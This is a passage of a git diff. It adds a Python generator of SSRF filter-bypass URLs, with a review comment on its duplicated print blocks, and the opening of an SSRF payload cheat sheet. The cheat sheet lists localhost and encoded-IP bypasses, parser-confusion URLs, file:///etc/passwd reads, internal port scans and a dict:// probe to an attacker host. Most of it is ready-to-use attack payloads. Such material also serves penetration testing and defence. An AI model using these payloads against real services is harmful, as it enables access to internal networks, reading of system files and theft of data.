print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP10,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 11 - Dotted octal with padding + Dotless decimal
|
||||||
|
print(bluecolor,"Dotted octal with padding + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP11 = '0' + OCT_SINGLE(ipFrag3) + "." + str(DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP11,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP11,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 12 - Dotted octal with padding + Dotted hexadecimal + Dotless decimal
|
||||||
|
print(bluecolor,"Dotted octal with padding + Dotted hexadecimal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP12 = '0' + OCT_SINGLE(ipFrag3) + "." + HEX_SINGLE(ipFrag2,"yes") + "." + str(DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP12,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP12,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 13 - Abusing IDNA Standard
|
||||||
|
print(bluecolor,"Abusing IDNA Standard: ",resetcolor,yellowcolor,"http://ß.localdomain.pw/", resetcolor,' -> ',yellowcolor,'http://cc.localdomain.pw/',resetcolor,' => ',bluecolor,'DNS',resetcolor,' => ',yellowcolor,'127.127.127.127',resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print('http://ß.localdomain.pw/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://ß.localdomain.pw/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 14 - Abusing 。and 。
|
||||||
|
IPAddressParts = arg1.split(".")
|
||||||
|
print(bluecolor,"Abusing 。and 。: ",resetcolor,yellowcolor,"http://",IPAddressParts[0],"。",IPAddressParts[1],"。",IPAddressParts[2],"。",IPAddressParts[3],"/",resetcolor," and " ,yellowcolor,"http://",IPAddressParts[0],"。",IPAddressParts[1],"。",IPAddressParts[2],"。",IPAddressParts[3],"/", resetcolor,' -> ',yellowcolor,"http://",IPAddressParts[0],".",IPAddressParts[1],".",IPAddressParts[2],".",IPAddressParts[3],"/",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',sep='')
|
||||||
|
print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',file=f,sep='')
|
||||||
|
print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 15 Abusing Enclosed Alphanumerics
|
||||||
|
print(bluecolor,"Abusing Enclosed Alphanumerics:",resetcolor," ",yellowcolor,'http://',convertIP2EnclosedAlphanumericsValue(), resetcolor,' -> ',yellowcolor,"http://",arg1,resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print('http://',convertIP2EnclosedAlphanumericsValue(),'/',sep='')
|
||||||
|
print('http://',convert_ip(IP1),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP2),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP3),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP4),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP5),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP6),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP7),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP8),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP9),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP10),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP11),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP12),':',PORT,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',convertIP2EnclosedAlphanumericsValue(),'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP1),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP2),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP3),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP4),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP5),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP6),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP7),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP8),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP9),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP10),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP11),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP12),':',PORT,'/',file=f,sep='')
|
||||||
|
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
f.close()
|
||||||
|
print("\n",bluecolor,'-----------------------------------------------------------------------------------------------------------------------------------------',resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("Results are exported to: " + FILENAME,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print(bluecolor,'-----------------------------------------------------------------------------------------------------------------------------------------',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
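Review bot: the `RANDPREFIXTEXTSPEC` variants of the `@` and `+@` combos drop `PORT` after the colon in every case from IP8 through IP12, on screen and in the export copy, e.g. `print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')`, while the `RANDPREFIXTEXT` lines beside them emit `':',PORT,'@'`. If the empty port is a deliberate variant, it needs a comment saying so; otherwise add `PORT`. The same twenty prints are written twice per case (stdout, then `file=f`) and the copies have already drifted: the on-screen list puts `RANDPREFIXTEXTSPEC` before `RANDPREFIXTEXT`, the export list reverses them. Building each case's URL list once in a helper and writing it to both destinations would remove that drift, and opening the export file in a `with` block would replace the separate `f.close()`. In Case 14 the two prints are identical as rendered here, so if the second is meant to use a different full-stop code point, write both as `\u` escapes so the difference survives editors and diffs. Case 13's banner shows `ß.localdomain.pw` becoming `cc.localdomain.pw`; IDNA2003 mapping folds `ß` to `ss`, so that label should be checked.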
BIN
Server-Side Request Forgery/Images/Parser & Curl < 7.54.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 179 KiB |
BIN
Server-Side Request Forgery/Images/SSRF_Parser.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 381 KiB |
BIN
Server-Side Request Forgery/Images/SSRF_stream.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 67 KiB |
BIN
Server-Side Request Forgery/Images/WeakParser.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 106 KiB |
512
Server-Side Request Forgery/README.md
Normal file
@ -0,0 +1,512 @@
|
|||||||
|
# Server-Side Request Forgery
|
||||||
|
|
||||||
|
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Payloads with localhost](#exploit-with-localhost)
|
||||||
|
* [Bypassing filters](#bypassing-filters)
|
||||||
|
* [SSRF exploitation via URL Scheme](#ssrf-via-url-scheme)
|
||||||
|
* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera)
|
||||||
|
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
||||||
|
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
||||||
|
* [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
|
||||||
|
* [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)
|
||||||
|
* [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)
|
||||||
|
* [SSRF URL for Azure](#ssrf-url-for-azure)
|
||||||
|
* [SSRF URL for OpenStack/RackSpace](#ssrf-url-for-openstackrackspace)
|
||||||
|
* [SSRF URL for HP Helion](#ssrf-url-for-hp-helion)
|
||||||
|
* [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
|
||||||
|
* [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
|
||||||
|
* [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
|
||||||
|
* [SSRF URL for Docker](#ssrf-url-for-docker)
|
||||||
|
* [SSRF URL for Rancher](#ssrf-url-for-rancher)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
|
||||||
|
- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
|
||||||
|
|
||||||
|
## Payloads with localhost
|
||||||
|
|
||||||
|
Basic SSRF v1
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://127.0.0.1:80
|
||||||
|
http://127.0.0.1:443
|
||||||
|
http://127.0.0.1:22
|
||||||
|
http://0.0.0.0:80
|
||||||
|
http://0.0.0.0:443
|
||||||
|
http://0.0.0.0:22
|
||||||
|
```
|
||||||
|
|
||||||
|
Basic SSRF - Alternative version
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://localhost:80
|
||||||
|
http://localhost:443
|
||||||
|
http://localhost:22
|
||||||
|
```
|
||||||
|
|
||||||
|
Advanced exploit using a redirection
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
|
||||||
|
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
|
||||||
|
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||||
|
```
|
||||||
|
|
||||||
|
Advanced exploit using type=url
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Change "type=file" to "type=url"
|
||||||
|
Paste URL in text field and hit enter
|
||||||
|
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||||
|
```
|
||||||
|
|
||||||
|
## Bypassing filters
|
||||||
|
|
||||||
|
Bypass using HTTPS
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
https://127.0.0.1/
|
||||||
|
https://localhost/
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass localhost with [::]
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://[::]:80/
|
||||||
|
http://[::]:25/ SMTP
|
||||||
|
http://[::]:22/ SSH
|
||||||
|
http://[::]:3128/ Squid
|
||||||
|
```
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://0000::1:80/
|
||||||
|
http://0000::1:25/ SMTP
|
||||||
|
http://0000::1:22/ SSH
|
||||||
|
http://0000::1:3128/ Squid
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass localhost with a domain redirecting to locahost
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://localtest.me
|
||||||
|
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
||||||
|
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
|
||||||
|
```
|
||||||
|
|
||||||
|
The service nip.io is awesome for that, it will convert any ip address as a dns.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass localhost with CIDR : 127.x.x.x
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
it's a /8
|
||||||
|
http://127.127.127.127
|
||||||
|
http://127.0.1.3
|
||||||
|
http://127.0.0.0
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using a decimal ip location
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://0177.0.0.1/
|
||||||
|
http://2130706433/ = http://127.0.0.1
|
||||||
|
http://3232235521/ = http://192.168.0.1
|
||||||
|
http://3232235777/ = http://192.168.1.1
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using malformed urls
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
localhost:+11211aaa
|
||||||
|
localhost:00011211aaaa
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using rare address
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://0/
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using bash variables (curl only)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl -v "http://evil$google.com"
|
||||||
|
$google = ""
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using tricks combination
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
||||||
|
urllib2 : 1.1.1.1
|
||||||
|
requests + browsers : 2.2.2.2
|
||||||
|
urllib : 3.3.3.3
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
|
||||||
|
|
||||||
|
List:
|
||||||
|
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass filter_var() php function
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
0://evil.com:80;http://google.com:80/
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://127.1.1.1:80\@127.2.2.2:80/
|
||||||
|
http://127.1.1.1:80\@@127.2.2.2:80/
|
||||||
|
http://127.1.1.1:80:\@@127.2.2.2:80/
|
||||||
|
http://127.1.1.1:80#\@127.2.2.2:80/
|
||||||
|
```
|
||||||
|
|
||||||
|
![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg)
|
||||||
|
|
||||||
|
|
||||||
|
## SSRF exploitation via URL Scheme
|
||||||
|
|
||||||
|
File : allows an attacker to fetch the content of a file on the server
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
file://path/to/file
|
||||||
|
file:///etc/passwd
|
||||||
|
file://\/\/etc/passwd
|
||||||
|
ssrf.php?url=file:///etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
|
Http: allows an attacker to fetch any content from the web, it can also be used to scan ports.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=http://127.0.0.1:22
|
||||||
|
ssrf.php?url=http://127.0.0.1:80
|
||||||
|
ssrf.php?url=http://127.0.0.1:443
|
||||||
|
```
|
||||||
|
|
||||||
|
![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_stream.png)
|
||||||
|
|
||||||
|
The following URL scheme can be used to probe the network
|
||||||
|
|
||||||
|
Dict : the DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
|
||||||
|
ssrf.php?url=dict://attacker:11111/
|
||||||
|
```
|
||||||
|
|
||||||
|
